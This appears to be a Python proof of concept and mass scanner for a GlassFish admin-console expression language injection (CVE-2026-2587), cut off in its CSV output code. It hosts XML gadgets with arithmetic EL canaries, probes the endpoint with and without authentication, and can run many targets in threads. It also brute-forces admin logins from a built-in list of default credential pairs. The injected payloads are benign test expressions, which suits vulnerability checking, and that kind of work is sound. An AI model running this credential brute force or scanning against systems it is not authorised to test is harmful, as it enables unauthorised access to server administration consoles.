README.md
Rendering markdown...
#!/usr/bin/env python3
"""
CVE-2026-2587 — GlassFish EL Injection Validator
GHSA: GHSA-29wv-cv7p-xjc2 | CVSS 9.6 Critical | CWE-917
CONFIRMED BEHAVIOUR (live-tested on GlassFish 7.0.15)
───────────────────────────────────────────────────────
✅ EL evaluated in : <ModulePrefs title="#{expr}">
✅ EL evaluated in : <ModulePrefs description="#{expr}">
❌ NOT evaluated in: <Content><![CDATA[...]]> ← CDATA blocks EL
AUTH
────
Direct request → FORM auth (200 login page not 302)
Real attack → CSRF against logged-in admin (PR:N / UI:R)
Validation → --cookie "JSESSIONID=..." is most reliable
USAGE — SINGLE TARGET
─────────────────────
python3 CVE-2026-2587-Exploit-POC.py \
--base https://localhost:4848 \
--listen 0.0.0.0:8000 \
--callback-url http://host.docker.internal:8000 \
--cookie "JSESSIONID=abc123" --insecure
python3 CVE-2026-2587-Exploit-POC.py \
--base https://localhost:4848 \
--listen 0.0.0.0:8000 \
--callback-url http://host.docker.internal:8000 \
--username admin --password admin --insecure
python3 CVE-2026-2587-Exploit-POC.py \
--base https://localhost:4848 \
--listen 0.0.0.0:8000 \
--callback-url http://host.docker.internal:8000 \
--brute --insecure
USAGE — MULTIPLE TARGETS
─────────────────────────
# targets.txt — one URL per line, optional per-target creds:
# https://server1:4848
# https://server2:4848 admin password123
# https://server3:4848 ops secret
python3 CVE-2026-2587-Exploit-POC.py \
--targets-file targets.txt \
--listen 0.0.0.0:8000 \
--callback-url https://abc123.ngrok-free.app \
--username admin --password admin \
--threads 5 --insecure \
--csv results.csv
USAGE — OUTPUT FORMATS
───────────────────────
--json JSON report to stdout
--csv FILE CSV report written to FILE
--csv - CSV to stdout
USAGE — PROXY / HEADERS
────────────────────────
--proxy http://127.0.0.1:8080 (Burp/ZAP)
--header "X-Forwarded-For: 1.2.3.4" (repeatable)
USE ONLY ON SYSTEMS YOU OWN OR ARE AUTHORISED TO TEST.
"""
from __future__ import annotations
import argparse
import contextlib
import csv
import html
import http.server
import io
import json
import random
import re
import socketserver
import sys
import threading
import time
import warnings
from concurrent.futures import ThreadPoolExecutor, as_completed
from dataclasses import dataclass
from datetime import datetime, timezone
from typing import Any, Optional
from urllib.parse import quote, urlparse
try:
import requests
from urllib3.exceptions import InsecureRequestWarning
except ImportError:
sys.exit("[!] pip install requests")
try:
from colorama import Fore, Style, init as _ci; _ci()
G = Fore.GREEN; R = Fore.RED; Y = Fore.YELLOW; B = Fore.CYAN; RESET = Style.RESET_ALL
except ImportError:
G = R = Y = B = RESET = ""
def _ok(s): return f"{G}[+] {s}{RESET}"
def _fail(s): return f"{R}[-] {s}{RESET}"
def _warn(s): return f"{Y}[!] {s}{RESET}"
def _inf(s): return f" {s}"
def _hdr(s): return f"{B}{s}{RESET}"
# ══════════════════════════════════════════════════════════════════════════════
# BRUTE-FORCE CREDENTIAL LIST
# Common GlassFish default / vendor credentials tried when --brute is given.
# ══════════════════════════════════════════════════════════════════════════════
BRUTE_CREDS: list[tuple[str, str]] = [
("admin", "admin"),
("admin", ""),
("admin", "adminadmin"),
("admin", "password"),
("admin", "admin123"),
("admin", "Admin1234"),
("admin", "glassfish"),
("admin", "glassfishadmin"),
("admin", "changeit"),
("admin", "changeme"),
("admin", "secret"),
("admin", "welcome1"),
("admin", "oracle"),
("admin", "Oracle123"),
("administrator", "administrator"),
("administrator", "password"),
("administrator", "admin"),
("glassfish", "glassfish"),
("root", "root"),
("root", "password"),
("root", "toor"),
]
# ══════════════════════════════════════════════════════════════════════════════
# CANARY — single arithmetic probe (for Phase 1 + static --xml-url mode)
# ══════════════════════════════════════════════════════════════════════════════
@dataclass(frozen=True)
class Canary:
prefix: str
left: int
right: int
@property
def expr(self) -> str:
return f"#{{{self.left}*{self.right}}}"
@property
def value(self) -> str:
return str(self.left * self.right)
@property
def title_raw(self) -> str:
return f"{self.prefix}_TITLE_{self.expr}_END"
@property
def title_eval(self) -> str:
return f"{self.prefix}_TITLE_{self.value}_END"
@property
def body_raw(self) -> str:
return f"{self.prefix}_BODY_{self.expr}_END"
@property
def body_eval(self) -> str:
return f"{self.prefix}_BODY_{self.value}_END"
def xml(self) -> bytes:
return f"""<?xml version="1.0" encoding="UTF-8"?>
<Module id="cve-2026-2587-safe-check">
<ModulePrefs title="{self.title_raw}" />
<Content type="html">
<![CDATA[<div>{self.body_raw}</div>]]>
</Content>
</Module>
""".encode()
def as_dict(self) -> dict:
return {
"expression": self.expr, "expected_value": self.value,
"title_raw": self.title_raw, "title_eval": self.title_eval,
"body_raw": self.body_raw, "body_eval": self.body_eval,
}
# ══════════════════════════════════════════════════════════════════════════════
# TEST CASES — 10 distinct EL probes, each served at its own path
# ══════════════════════════════════════════════════════════════════════════════
@dataclass
class TestCase:
name: str
description: str
path: str
el_expr: str
expected: str
def build_test_cases(tag: int) -> list[TestCase]:
return [
TestCase("TC-01 Basic multiply", "#{7*7} → 49",
"/tc01.xml", "7*7", "49"),
TestCase("TC-02 Addition", "#{1337+2587} → 3924",
"/tc02.xml", "1337+2587", "3924"),
TestCase("TC-03 Large multiply", "#{31337*271} → 8492327",
"/tc03.xml", "31337*271", "8492327"),
TestCase("TC-04 Subtraction", "#{9999-1337} → 8662",
"/tc04.xml", "9999-1337", "8662"),
TestCase("TC-05 Nested arithmetic", "#{(6+1)*(6+1)} → 49",
"/tc05.xml", "(6+1)*(6+1)", "49"),
TestCase("TC-06 Ternary conditional", "#{1==1?'VULN':'SAFE'} → VULN",
"/tc06.xml", "1==1?'VULN':'SAFE'", "VULN"),
TestCase("TC-07 String concat", "#{'CVE'.concat('2026')} → CVE2026",
"/tc07.xml", "'CVE'.concat('2026')", "CVE2026"),
TestCase("TC-08 Chained concat", "#{'GL'.concat('ASS').concat('FISH')} → GLASSFISH",
"/tc08.xml", "'GL'.concat('ASS').concat('FISH')", "GLASSFISH"),
TestCase("TC-09 Modulo", "#{17 mod 5} → 2",
"/tc09.xml", "17 mod 5", "2"),
TestCase("TC-10 Large addition", "#{100*100} → 10000",
"/tc10.xml", "100*100", "10000"),
]
def make_tc_xml(tc: TestCase, tag: int) -> tuple[bytes, str, str]:
"""Returns (xml_bytes, detect_token, raw_prefix)."""
marker = f"PROBE{tag}"
detect = f"{marker}_{tc.expected}_END"
raw = f"{marker}_#"
xml = (
f'<?xml version="1.0" encoding="UTF-8"?>\n'
f'<Module>\n'
f' <ModulePrefs title="{marker}_#{{{tc.el_expr}}}_END"/>\n'
f' <Content type="html"><![CDATA[ok]]></Content>\n'
f'</Module>\n'
).encode()
if tc.path == "/tc09.xml":
detect = f"{marker}_2" # mod may render 2 or 2.0
return xml, detect, raw
# ══════════════════════════════════════════════════════════════════════════════
# SHARED XML SERVER
# One server, shared across all target threads.
# ══════════════════════════════════════════════════════════════════════════════
class _State:
routes: dict[str, bytes] = {}
hits: dict[str, int] = {}
lock: threading.Lock = threading.Lock()
verbose: bool = False
class _Handler(http.server.BaseHTTPRequestHandler):
def log_message(self, fmt: str, *args: object) -> None:
if _State.verbose:
super().log_message(fmt, *args)
def do_GET(self) -> None:
path = self.path.split("?")[0]
with _State.lock:
_State.hits[path] = _State.hits.get(path, 0) + 1
body = _State.routes.get(path, b"")
if not body:
self.send_response(404); self.end_headers(); return
self.send_response(200)
self.send_header("Content-Type", "application/xml; charset=utf-8")
self.send_header("Content-Length", str(len(body)))
self.end_headers()
self.wfile.write(body)
class _Server(socketserver.ThreadingMixIn, http.server.HTTPServer):
daemon_threads = True
allow_reuse_address = True
@contextlib.contextmanager
def xml_server(listen: str, verbose: bool):
if ":" not in listen:
raise ValueError("--listen must be host:port e.g. 0.0.0.0:8000")
host, port_s = listen.rsplit(":", 1)
_State.routes = {}
_State.hits = {}
_State.verbose = verbose
srv = _Server((host, int(port_s)), _Handler)
threading.Thread(target=srv.serve_forever, daemon=True).start()
try:
yield
finally:
srv.shutdown()
srv.server_close()
# ══════════════════════════════════════════════════════════════════════════════
# AUTH HELPERS
# ══════════════════════════════════════════════════════════════════════════════
def _norm(u: str) -> str:
u = u.strip().rstrip("/")
return u if u.startswith(("http://", "https://")) else "http://" + u
def _context_root(ep: str) -> str:
path = urlparse(ep).path
marker = "/common/gadgets/gadget.jsf"
return path.split(marker)[0] if marker in path else ""
def _url(ep: str, suffix: str) -> str:
p = urlparse(ep)
return f"{p.scheme}://{p.netloc}{_context_root(ep)}{suffix}"
def looks_like_login(resp: requests.Response) -> bool:
text = (resp.text or "").lower()
url = resp.url.lower()
return (
"login.jsf" in url
or "j_security_check" in url
or "j_username" in text
or "j_password" in text
or ("glassfish administration console" in text and "login" in text)
)
def make_session(args: argparse.Namespace,
username: Optional[str] = None,
password: Optional[str] = None,
cookie: Optional[str] = None) -> requests.Session:
"""Build a requests.Session with auth, headers, proxy."""
s = requests.Session()
s.headers["User-Agent"] = "cve-2026-2587-validator/3.0"
ck = cookie or args.cookie
if ck:
s.headers["Cookie"] = ck
if args.header:
for h in args.header:
if ":" not in h:
raise ValueError(f"Invalid --header {h!r}")
k, v = h.split(":", 1)
s.headers[k.strip()] = v.strip()
if args.proxy:
s.proxies.update({"http": args.proxy, "https": args.proxy})
return s
def try_login(session: requests.Session, ep: str,
username: str, password: str,
timeout: int, verify: bool, verbose: bool) -> bool:
"""
GlassFish form login. Always uses the root j_security_check — never
derived from a context root like /asadmin because that path does not exist.
Flow:
1. GET /login.jsf → seeds JSESSIONID in session cookie jar
2. POST /j_security_check → submits credentials
3. GET /common/index.jsf → confirms session is authenticated
"""
p = urlparse(ep)
root = f"{p.scheme}://{p.netloc}"
login = f"{root}/login.jsf"
action = f"{root}/j_security_check"
console = f"{root}/common/index.jsf"
try:
# Step 1 — seed session cookie
session.get(login, timeout=timeout, verify=verify, allow_redirects=True)
# Step 2 — submit credentials
r = session.post(
action,
data={"j_username": username, "j_password": password},
timeout=timeout, verify=verify, allow_redirects=True,
)
except requests.RequestException as e:
if verbose: print(_warn(f"Login request error: {e}"))
return False
final = r.url.rstrip("/")
if verbose: print(_inf(f"Login POST final URL: {final}"))
if "j_security_check" in final:
if verbose: print(_warn(f"Credentials rejected by GlassFish (final URL: {final})"))
return False
# Step 3 — confirm session reaches the console
try:
v = session.get(console, timeout=timeout, verify=verify, allow_redirects=True)
if looks_like_login(v):
if verbose: print(_warn("POST succeeded but console still requires auth"))
return False
except requests.RequestException:
pass # network hiccup — trust the POST result
if verbose: print(_ok(f"Login confirmed — session active"))
return True
def brute_force_login(
args: argparse.Namespace,
eps: list[str],
xml_url: str,
verify: bool,
verbose: bool,
) -> tuple[Optional[requests.Session], Optional[str], Optional[str]]:
"""
Try each entry in BRUTE_CREDS in order.
Verification strategy:
1. Seed JSESSIONID via GET /login.jsf
2. POST credentials to /j_security_check
3. Reject only if the POST remains on j_security_check
4. Confirm with the gadget endpoint body. Some GlassFish builds redirect
valid form logins back to login.jsf, so the POST final URL alone is
not enough to reject a credential pair.
Returns (session, username, password) on first success, (None, None, None) otherwise.
"""
if not eps:
return None, None, None
p = urlparse(eps[0])
root = f"{p.scheme}://{p.netloc}"
login_url = f"{root}/login.jsf"
action_url = f"{root}/j_security_check"
for username, password in BRUTE_CREDS:
session = make_session(args)
if verbose:
pw_display = repr(password) if password else "(empty)"
print(_inf(f" Trying {username!r} / {pw_display!r}"))
try:
session.get(login_url, timeout=args.timeout, verify=verify,
allow_redirects=True)
r = session.post(
action_url,
data={"j_username": username, "j_password": password},
timeout=args.timeout, verify=verify, allow_redirects=True,
)
except requests.RequestException as exc:
if verbose:
print(_warn(f" Request error: {exc}"))
continue
# Wrong credentials can remain on j_security_check. A final login.jsf
# URL is not decisive on GlassFish 7.0.15; valid sessions can land
# there and still authenticate subsequent admin-console requests.
final = r.url.lower().rstrip("/")
if "j_security_check" in final:
continue
# Confirm by probing the gadget endpoint. Invalid sessions receive the
# login form here; valid sessions reach the gadget handler even if the
# XML callback later fails.
for ep in eps:
try:
check = do_get(session, ep, xml_url, args.timeout, verify)
except requests.RequestException:
continue
if check is None:
continue
if check.status_code in (401, 403):
break
if not looks_like_login(check):
if verbose:
print(_ok(f" Confirmed: {username!r} / {repr(password) if password else '(empty)'}"))
return session, username, password
return None, None, None
# ══════════════════════════════════════════════════════════════════════════════
# VERSION DETECTION
# Admin console URL structure is identical across GlassFish 3.x–8.x so paths
# never change. Version detection is used purely for reporting and triage.
# ══════════════════════════════════════════════════════════════════════════════
# Public advisories currently list affected and patched versions as unknown.
# Keep version data as reporting context only; proof decides the verdict.
_VER_RE = re.compile(
r"(?:Eclipse\s+GlassFish|GlassFish(?:\s+Server)?(?:\s+Open\s+Source\s+Edition)?)"
r"\s+(\d+)\.(\d+)(?:\.(\d+))?",
re.IGNORECASE,
)
def _parse_version(text: str) -> Optional[tuple[int, int, int]]:
m = _VER_RE.search(text)
if m:
return int(m.group(1)), int(m.group(2)), int(m.group(3) or 0)
return None
def is_affected(major: int, minor: int, patch: int) -> Optional[bool]:
"""Return advisory affected status when a version boundary is published."""
return None
def detect_glassfish_version(
root: str,
session: requests.Session,
timeout: int,
verify: bool,
) -> dict[str, Any]:
"""
Fingerprint GlassFish version via four methods in order:
1. Server / X-Powered-By response headers (any endpoint, cheapest)
2. REST management API /management/domain (JSON, no auth needed)
3. Admin login page body text
4. /__asadmin/version.json (exact version; needs auth, skip on 401/403)
Also discovers the GUI context-root from redirect Location headers so
resolve_endpoints() can try non-default prefixes (/admin, /console, …).
Returns dict:
version_string, major, minor, patch, source, affected, context_root_hint
"""
empty: dict[str, Any] = {
"version_string": "", "major": 0, "minor": 0, "patch": 0,
"source": "", "affected": None, "context_root_hint": "",
}
context_root_hint = ""
def _make(triple: tuple[int, int, int], src: str, raw: str) -> dict[str, Any]:
maj, min_, pat = triple
return {
"version_string": raw,
"major": maj, "minor": min_, "patch": pat,
"source": src,
"affected": is_affected(maj, min_, pat),
"context_root_hint": context_root_hint,
}
def _learn_context_root(location: str) -> None:
"""Parse redirect Location to learn a non-default GUI context root."""
nonlocal context_root_hint
if not location or context_root_hint:
return
# e.g. Location: /admin/login.jsf → root hint = "/admin"
m = re.match(r"^(/[^/]+)/(?:login\.jsf|common/)", location)
if m and m.group(1) not in ("/common", "/asadmin"):
context_root_hint = m.group(1)
# 1. Headers — try cheap endpoints; capture redirect hints along the way
for path in ("/", "/login.jsf", "/common/index.jsf"):
try:
r = session.get(root + path, timeout=timeout, verify=verify,
allow_redirects=False)
_learn_context_root(r.headers.get("Location", ""))
# Follow manually to get the final response headers too
if r.status_code in (301, 302, 303, 307, 308):
loc = r.headers.get("Location", "")
if loc:
target_url = loc if loc.startswith("http") else root + loc
r = session.get(target_url, timeout=timeout, verify=verify,
allow_redirects=True)
except requests.RequestException:
continue
for hdr in ("Server", "X-Powered-By"):
val = r.headers.get(hdr, "")
if val:
t = _parse_version(val)
if t:
return _make(t, f"header:{hdr}", val.strip())
# 2. REST management API
for mgmt in (root + "/management/domain", root + "/management/domain.json"):
try:
r = session.get(mgmt, timeout=timeout, verify=verify,
allow_redirects=True,
headers={"Accept": "application/json"})
if r.status_code != 200:
continue
try:
data = r.json()
extra = data.get("extraProperties", {})
for key in ("GlassFish-version", "version-number", "version"):
val = extra.get(key, "")
if val:
t = _parse_version(val)
if t:
return _make(t, "rest-api", val.strip())
except (ValueError, AttributeError):
pass
t = _parse_version(r.text)
if t:
m = _VER_RE.search(r.text)
return _make(t, "rest-api", m.group(0).strip() if m else "")
except requests.RequestException:
continue
# 3. Login page body
try:
r = session.get(root + "/login.jsf", timeout=timeout,
verify=verify, allow_redirects=True)
t = _parse_version(r.text)
if t:
m = _VER_RE.search(r.text)
return _make(t, "login-page", m.group(0).strip() if m else "")
except requests.RequestException:
pass
# 4. /__asadmin/version.json — exact version, usually auth-required;
# works when called with an authenticated session after login.
for ver_path in ("/__asadmin/version.json", "/__asadmin/version"):
try:
r = session.get(root + ver_path, timeout=timeout, verify=verify,
allow_redirects=False)
if r.status_code in (401, 403):
continue # needs auth — skip silently
if r.status_code == 200:
t = _parse_version(r.text)
if t:
m = _VER_RE.search(r.text)
return _make(t, "asadmin-api", m.group(0).strip() if m else "")
except requests.RequestException:
continue
return {**empty, "context_root_hint": context_root_hint}
# ══════════════════════════════════════════════════════════════════════════════
# ENDPOINT RESOLUTION
# URL structure is consistent across GlassFish 3.x–8.x.
# ══════════════════════════════════════════════════════════════════════════════
GADGET_PATHS = [
"/common/gadgets/gadget.jsf",
"/admin/common/gadgets/gadget.jsf",
"/console/common/gadgets/gadget.jsf",
"/glassfish/common/gadgets/gadget.jsf",
"/asadmin/common/gadgets/gadget.jsf",
]
def resolve_endpoints(base: str, paths: Optional[list[str]],
context_root_hint: str = "") -> list[str]:
base = _norm(base)
parsed = urlparse(base)
root = f"{parsed.scheme}://{parsed.netloc}"
if paths:
cands = [p if p.startswith("/") else "/" + p for p in paths]
else:
cands = []
# Prepend hint-derived paths (learned from redirect Location headers)
if context_root_hint:
cands += [context_root_hint + gp for gp in GADGET_PATHS]
if parsed.path and parsed.path != "/":
cands += [parsed.path.rstrip("/") + gp for gp in GADGET_PATHS]
cands += list(GADGET_PATHS)
seen, out = set(), []
for p in cands:
url = root + p
if url not in seen:
seen.add(url); out.append(url)
return out
# ══════════════════════════════════════════════════════════════════════════════
# CLASSIFICATION
# ══════════════════════════════════════════════════════════════════════════════
def classify_canary(resp: requests.Response, canary: Canary) -> dict[str, Any]:
body = resp.text or ""
ev = {
"title_evaluated": canary.title_eval in body,
"body_evaluated": canary.body_eval in body,
"title_raw_seen": canary.title_raw in body,
"body_raw_seen": canary.body_raw in body,
"expression_seen": canary.expr in body,
}
base = {
"http_status": resp.status_code,
"final_url": resp.url,
"server": resp.headers.get("Server", ""),
"x_powered_by": resp.headers.get("X-Powered-By", ""),
"evidence": ev,
}
if resp.status_code in (401, 403) or looks_like_login(resp):
return {**base, "status": "AUTH_REQUIRED",
"detail": "Endpoint protected or redirected to login."}
if ev["title_evaluated"] or ev["body_evaluated"]:
detail = ("EL evaluated in title= only (CDATA not evaluated — expected)."
if ev["title_evaluated"] and not ev["body_evaluated"] else
"EL evaluated in body." if ev["body_evaluated"] and not ev["title_evaluated"]
else "EL evaluated in both title and body.")
return {**base, "status": "VULNERABLE", "detail": detail}
if resp.status_code >= 500:
detail = "Server 5xx — do not classify as patched."
error_summary = summarize_server_error(body)
if error_summary:
detail = f"{detail} {error_summary}"
return {**base, "status": "INCONCLUSIVE",
"detail": detail,
"body_sample": body[:400].replace("\n", " ")}
if ev["title_raw_seen"] or ev["body_raw_seen"] or ev["expression_seen"]:
return {**base, "status": "NOT_VULNERABLE_OR_ESCAPED",
"detail": "Canary reflected literally — EL not evaluated."}
return {**base, "status": "INCONCLUSIVE",
"detail": "No canary found in response.",
"body_sample": body[:400].replace("\n", " ")}
def summarize_server_error(body: str) -> str:
text = html.unescape(re.sub(r"<[^>]+>", " ", body or ""))
text = re.sub(r"\s+", " ", text).strip()
snippets = []
failed_open = re.search(r"Failed to open\s+\S+", text)
if failed_open:
snippets.append(failed_open.group(0))
if "PKIX path building failed" in text or "SSLHandshakeException" in text:
snippets.append("JVM TLS trust failure (PKIX path building failed)")
return " | ".join(snippets)
def classify_tc(resp: requests.Response, detect_token: str, raw_prefix: str) -> str:
if resp.status_code in (401, 403) or looks_like_login(resp):
return "AUTH_REQUIRED"
body = resp.text or ""
if detect_token in body:
return "VULNERABLE"
if raw_prefix in body:
return "NOT_VULNERABLE"
return "INCONCLUSIVE"
def do_get(session: requests.Session, endpoint: str, xml_url: str,
timeout: int, verify: bool) -> Optional[requests.Response]:
sep = "&" if "?" in endpoint else "?"
try:
return session.get(endpoint + sep + "gadget=" + quote(xml_url, safe=""),
timeout=timeout, verify=verify, allow_redirects=True)
except requests.RequestException:
return None
def normalize_callback_base(callback_url: str) -> tuple[str, Optional[str]]:
"""Return scheme://host[:port], with a Cloudflare quick-tunnel safety fix."""
parsed = urlparse(callback_url)
scheme = parsed.scheme
host = parsed.netloc
warning = None
if scheme == "https" and host.endswith(".trycloudflare.com"):
scheme = "http"
warning = (
f"trycloudflare HTTPS callback detected; using http://{host} so "
"GlassFish JVMs without Cloudflare TLS trust can fetch the XML."
)
return f"{scheme}://{host}", warning
# ══════════════════════════════════════════════════════════════════════════════
# TARGETS FILE PARSER
# Format per line (comments with # supported):
# https://server:4848
# https://server:4848 admin password
# https://server:4848 admin:password
# ══════════════════════════════════════════════════════════════════════════════
@dataclass
class Target:
base: str
username: Optional[str] = None
password: Optional[str] = None
cookie: Optional[str] = None
def load_targets_file(path: str) -> list[Target]:
targets = []
with open(path) as f:
for raw in f:
line = raw.strip()
if not line or line.startswith("#"):
continue
parts = line.split()
base = parts[0]
username = password = None
if len(parts) == 2:
# user:pass or just cookie=value
if ":" in parts[1] and not parts[1].startswith("http"):
username, password = parts[1].split(":", 1)
else:
username = parts[1]
elif len(parts) >= 3:
username, password = parts[1], parts[2]
targets.append(Target(base=base, username=username, password=password))
return targets
# ══════════════════════════════════════════════════════════════════════════════
# SINGLE-TARGET SCAN
# Returns a structured result dict for this target.
# ══════════════════════════════════════════════════════════════════════════════
def scan_one(
target: Target,
args: argparse.Namespace,
verify: bool,
canary: Canary,
xml_url: str, # canary XML URL (for Phase 1 + verification)
cb_base: str, # callback base URL (for per-TC paths)
test_cases: list[TestCase],
tc_built: list[tuple],
serve_mode: bool,
static_mode: bool,
verbose: bool,
print_lock: threading.Lock,
) -> dict[str, Any]:
ts = datetime.now(timezone.utc).isoformat()
username = target.username or args.username
password = target.password or args.password
cookie = target.cookie or args.cookie
result: dict[str, Any] = {
"target": target.base,
"timestamp": ts,
"verdict": "ERROR",
"unauth_result": "UNKNOWN",
"active_endpoint": None,
"server_header": "",
"detected_version": "",
"version_source": "",
"version_affected": "",
"admin_console": "unknown",
"gadget_endpoint": "unknown",
"proof": "not_attempted",
"vulnerable_count": 0,
"total_tests": len(test_cases),
"tc_results": [],
"brute_creds": None,
"tested_paths": [],
"error": None,
}
def _log(*msgs):
if verbose:
with print_lock:
for m in msgs: print(m)
# ── Version detection (run before eps resolution to learn context_root_hint)
_det_session = make_session(args)
_parsed = urlparse(_norm(target.base))
_root = f"{_parsed.scheme}://{_parsed.netloc}"
ver_info = detect_glassfish_version(_root, _det_session, args.timeout, verify)
if ver_info["version_string"]:
result["detected_version"] = ver_info["version_string"]
result["version_source"] = ver_info["source"]
result["version_affected"] = ("YES" if ver_info["affected"] is True
else "NO" if ver_info["affected"] is False
else "UNKNOWN")
_log(_inf(
f"[{target.base}] Version: {ver_info['version_string']}"
f" (via {ver_info['source']})"
f" affected={result['version_affected']}"
))
else:
result["version_affected"] = "UNKNOWN"
_log(_inf(f"[{target.base}] Version: could not detect — trying all endpoints"))
# ── Endpoint resolution (uses context_root_hint from version detection)
eps = resolve_endpoints(target.base, args.path, ver_info.get("context_root_hint", ""))
# ── Phase 1: unauthenticated ─────────────────────────────────────────────
unauth = make_session(args) # no cookie
if cookie: unauth.headers.pop("Cookie", None) # strip for unauth probe
for ep in eps:
result["tested_paths"].append(ep)
resp = do_get(unauth, ep, xml_url, args.timeout, verify)
if resp is None:
result["unauth_result"] = "ERROR"; continue
r = classify_canary(resp, canary)
result["unauth_result"] = r["status"]
result["server_header"] = r.get("server", "")
if r["status"] == "AUTH_REQUIRED":
result["admin_console"] = "present"
result["gadget_endpoint"] = "blocked"
elif r["status"] in ("VULNERABLE", "NOT_VULNERABLE_OR_ESCAPED", "INCONCLUSIVE"):
result["admin_console"] = "present"
result["gadget_endpoint"] = "present"
if r["status"] == "VULNERABLE":
result["verdict"] = "VULNERABLE_UNAUTH"
result["proof"] = "evaluated"
_log(_ok(f"[{target.base}] VULNERABLE WITHOUT AUTH — {ep}"))
return result
if r["status"] in ("AUTH_REQUIRED", "NOT_VULNERABLE_OR_ESCAPED"):
break
if args.check_unauth_only:
result["verdict"] = result["unauth_result"]
return result
# ── Phase 2: auth ────────────────────────────────────────────────────────
brute_mode = getattr(args, "brute", False)
if not username and not cookie and not brute_mode:
result["verdict"] = "AUTH_REQUIRED"
result["error"] = "No credentials supplied for this target."
_log(_warn(f"[{target.base}] No credentials — skipping authenticated scan."))
return result
login_ep = eps[0] if eps else target.base
if brute_mode:
_log(_inf(f"[{target.base}] Brute-forcing {len(BRUTE_CREDS)} credential pairs ..."))
session, found_user, found_pass = brute_force_login(args, eps, xml_url, verify, verbose)
if session is None:
result["verdict"] = "AUTH_REQUIRED"
result["error"] = f"Brute force exhausted {len(BRUTE_CREDS)} credential pairs — none succeeded."
_log(_warn(f"[{target.base}] Brute force failed — no valid credentials found."))
return result
display_pass = found_pass if found_pass else "(empty)"
result["brute_creds"] = f"{found_user}:{display_pass}"
_log(_ok(f"[{target.base}] Brute force success — {found_user!r} / {display_pass!r}"))
else:
session = make_session(args, username=username, password=password, cookie=cookie)
if username and not cookie:
_log(_inf(f"[{target.base}] Logging in as '{username}' ..."))
# Always login against the base URL root — never against /asadmin/ or
# any derived context root since /asadmin/j_security_check does not exist.
logged_in = try_login(session, login_ep, username, password or "",
args.timeout, verify, verbose)
if logged_in:
_log(_ok(f"[{target.base}] Login verified."))
else:
_log(_warn(f"[{target.base}] Form login failed — trying endpoint anyway."))
_log(_inf(f"[{target.base}] If this keeps failing, use --cookie instead."))
# Verify session reaches endpoint
active_ep = None
for ep in eps:
if ep not in result["tested_paths"]:
result["tested_paths"].append(ep)
resp = do_get(session, ep, xml_url, args.timeout, verify)
if resp is not None and not looks_like_login(resp):
active_ep = ep
result["gadget_endpoint"] = "present"
if not result["server_header"]:
result["server_header"] = resp.headers.get("Server", "")
_log(_ok(f"[{target.base}] Session valid — {ep}"))
break
elif resp is not None and resp.status_code in (401, 403):
result["gadget_endpoint"] = "blocked"
if not active_ep:
result["verdict"] = "AUTH_REQUIRED"
result["error"] = "All endpoints returned login page. Cookie may be expired."
_log(_warn(f"[{target.base}] Auth failed — cookie expired or wrong password."))
return result
result["active_endpoint"] = active_ep
# ── Post-auth version re-probe via /__asadmin/version.json ──────────────
if not ver_info["version_string"] or ver_info["source"] != "asadmin-api":
for _vpath in ("/__asadmin/version.json", "/__asadmin/version"):
try:
_vr = session.get(_root + _vpath, timeout=args.timeout,
verify=verify, allow_redirects=False)
if _vr.status_code == 200:
_vt = _parse_version(_vr.text)
if _vt:
_vm = _VER_RE.search(_vr.text)
_maj, _min, _pat = _vt
result["detected_version"] = _vm.group(0).strip() if _vm else f"{_maj}.{_min}.{_pat}"
result["version_source"] = "asadmin-api"
_affected = is_affected(_maj, _min, _pat)
result["version_affected"] = ("YES" if _affected is True
else "NO" if _affected is False
else "UNKNOWN")
_log(_inf(f"[{target.base}] Post-auth version: {result['detected_version']}"
f" (affected={result['version_affected']})"))
break
except requests.RequestException:
continue
# ── Phase 3: test cases ─────────────────────────────────────────────────
if static_mode or not serve_mode:
resp = do_get(session, active_ep, xml_url, args.timeout, verify)
if resp is None:
result["verdict"] = "ERROR"
result["error"] = "Request failed"
return result
r = classify_canary(resp, canary)
result["verdict"] = r["status"]
result["vulnerable_count"] = 1 if r["status"] == "VULNERABLE" else 0
if r["status"] == "VULNERABLE":
result["proof"] = "evaluated"
elif r["status"] == "NOT_VULNERABLE_OR_ESCAPED":
result["proof"] = "not_evaluated"
if r["status"] in ("INCONCLUSIVE", "AUTH_REQUIRED"):
result["error"] = r.get("detail")
result["tc_results"] = [{
"name": "single-canary", "expr": canary.expr,
"expects": canary.value, "status": r["status"],
}]
return result
vuln_count = 0
tc_rows = []
for tc, _xml_bytes, detect_token, raw_prefix in tc_built:
tc_xml_url = f"{cb_base.rstrip('/')}{tc.path}"
resp = do_get(session, active_ep, tc_xml_url, args.timeout, verify)
status = "ERROR" if resp is None else classify_tc(resp, detect_token, raw_prefix)
if status == "VULNERABLE":
vuln_count += 1
tc_rows.append({
"name": tc.name, "expr": f"#{{{tc.el_expr}}}",
"expects": tc.expected, "status": status,
})
result["vulnerable_count"] = vuln_count
result["total_tests"] = len(test_cases)
result["tc_results"] = tc_rows
if vuln_count > 0:
result["verdict"] = "VULNERABLE"
result["proof"] = "evaluated"
elif tc_rows and all(row["status"] == "NOT_VULNERABLE" for row in tc_rows):
result["verdict"] = "NOT_VULNERABLE"
result["proof"] = "not_evaluated"
else:
result["verdict"] = "INCONCLUSIVE"
result["error"] = "No evaluated canaries found; one or more test cases were inconclusive."
return result
# ══════════════════════════════════════════════════════════════════════════════
# CSV OUTPUT
# ══════════════════════════════════════════════════════════════════════════════
TC_NAMES = [
"TC-01 Basic multiply", "TC-02 Addition", "TC-03 Large multiply",
"TC-04 Subtraction", "TC-05 Nested arithmetic", "TC-06 Ternary conditional",
"TC-07 String concat", "TC-08 Chained concat", "TC-09 Modulo",
"TC-10 Large addition",
]
CSV_FIELDS = (
["target", "timestamp", "verdict", "vulnerable_count", "total_tests",
"unauth_exposed", "active_endpoint", "server_header",
"detected_version", "version_source", "version_affected",
"admin_console", "gadget_endpoint", "proof", "brute_creds"]
+ TC_NAMES
+ ["notes"]
)
def results_to_csv_rows(results: list[dict]) -> list[dict]:
rows = []
for r in results:
tc_map = {t["name"]: t["status"] for t in r.get("tc_results", [])}
row = {
"target": r["target"],
"timestamp": r["timestamp"],
"verdict": r["verdict"],
"vulnerable_count": r["vulnerable_count"],
"total_tests": r["total_tests"],
"unauth_exposed": "YES" if r.get("unauth_result") == "VULNERABLE" else "no",
"active_endpoint": r.get("active_endpoint") or "",
"server_header": r.get("server_header", ""),
"detected_version": r.get("detected_version", ""),
"version_source": r.get("version_source", ""),
"version_affected": r.get("version_affected", "UNKNOWN"),
"admin_console": r.get("admin_console", "unknown"),
"gadget_endpoint": r.get("gadget_endpoint", "unknown"),
"proof": r.get("proof", "not_attempted"),
